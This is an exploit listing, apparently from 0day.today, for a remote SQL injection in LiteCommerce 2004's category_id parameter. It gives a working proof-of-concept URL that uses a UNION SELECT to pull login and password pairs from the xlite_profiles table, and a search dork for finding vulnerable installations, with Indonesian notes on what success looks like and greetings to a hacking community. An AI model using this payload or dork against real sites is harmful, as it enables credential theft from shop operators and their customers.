litecommerce 2004 (category_id) Remote SQL Injection Vulnerability

2007-08-21T00:00:00
ID 1337DAY-ID-2079
Type zdt
Reporter k1tk4t
Modified 2007-08-21T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
litecommerce 2004 (category_id) Remote SQL Injection Vulnerability
==================================================================



########################################################################
# litecommerce Copyright © 2004 - Remote SQL Injection
# Vendor        : http://www.litecommerce.com/
# Found By      : k1tk4t 
# Location      : Indonesia   
# Dork          : Powered by LiteCommerce
########################################################################
POC;

http://localhost/cart.php?target=category&category_id=9999)union/**/select/**/concat(login,'-',password)/**/from/**/xlite_profiles/*

jika exploit ini berhasil, anda akan melihat pesan error pada halaman, pesan error yang berisikan informasi kesalahan SQL
sekaligus memberikan informasi "login" dan "password" yang berada pada table xlite_profiles
exploit ini kemungkinan tidak berhasil pada litecommerce terbaru[tidak ada pesan error]
########################################################################
Terimakasih untuk;
str0ke
arioo[nyubicrew] yang telah memberikan link tersebut
xoron,y3dips,mathdule,iFX,x-ace,nyubi,selikoer,k1ngk0ng
dan semua temen2 komunitas security&hacking
-----------------------
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------


#  0day.today [2018-03-09]  #